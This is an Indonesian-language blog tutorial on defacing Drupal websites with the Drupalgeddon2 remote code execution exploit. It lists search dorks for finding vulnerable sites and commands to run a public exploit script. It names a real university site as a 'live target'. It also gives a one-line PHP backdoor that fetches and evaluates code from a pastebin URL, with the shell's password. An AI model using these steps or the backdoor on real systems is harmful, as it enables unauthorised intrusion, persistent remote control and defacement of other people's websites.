loading...

DRUPAL RCE UPLOAD SHELL

          Assalamualaikum warahmatullahi wabarakatuh.
Ketemu lagi dengan saya , kali ini saya membagikan tutorial deface menggunakan teknik DRUPAL RCE , tutorial deface ini menggunakan tools di terminal dengan bahasa Ruby . langsung saja tutorial nya ya :)

metode ini di gunakan untuk website yang memakai CMS Drupal

dork :

inurl:"*drupal_ajax"
intext:"powered by drupal"

kembangin lagi dengan otak kau yaa :'v

setelah menemukan site drupal tinggal eksekusi pakai tools nya saja,

buka terminal :

 $ apt-get install git
 $ gem install ruby
 $ git clone https://github.com/dreadlocked/Drupalgeddon2

buka file nya  
 $ cd Drupalgeddon2
cara pakai nya 
 $ ruby drupalgeddon2.rb <site>

contoh live target :
 $ ruby drupalgeddon2.rb http://school.unklab.ac.id/

jika berhasil nanti web nya ter connect ke terminal lo 


  cek dengan perintah
 $ uname -a
jika nanti muncul kernal web maka artinya berhasil



tinggal eksekusi deh . kalo mau tanam shell tinggal ketik gini

 $ echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > tn.php

fungsi nya command di atas adalah membuat file tn.php dengan shell backdoor file get content

#tulisan yang saya merahin itu url pastebin LAX shell ( password shell = LAX ) bisa juga di ganti shell kalian sendiri

cara manggil shell nya

http://site.com/tn.php

  

nah berhasil kita tanam shell nya , tinggal eksekusi deh wkwkwk

JIKA UPLOAD SHELL GAGAL KITA LANGSUNG WRITE FILE AJA LEWAT TERMINAL


 $ echo ' ISI ' > namafile.php




keluar dari tools nya :
 $ exit

sekian tutorial dari saya semoga bermanfaat yaa, index jan lupa backup :')
Bisa kali nitiv nick gue dan team gue, TN72 dan GARUDA TERSAKTI 72,

Kami juga menyediakan Toolsnya berbasis web, cek disini .
Kurang lebihnya mohon maaf wassalamualaikum warahmatullahi wabarakatuh :)


thanks to  :

LAmongan Xploiter
HACKER PATAH HATI
1 Komentar untuk "DRUPAL RCE UPLOAD SHELL"

Back To Top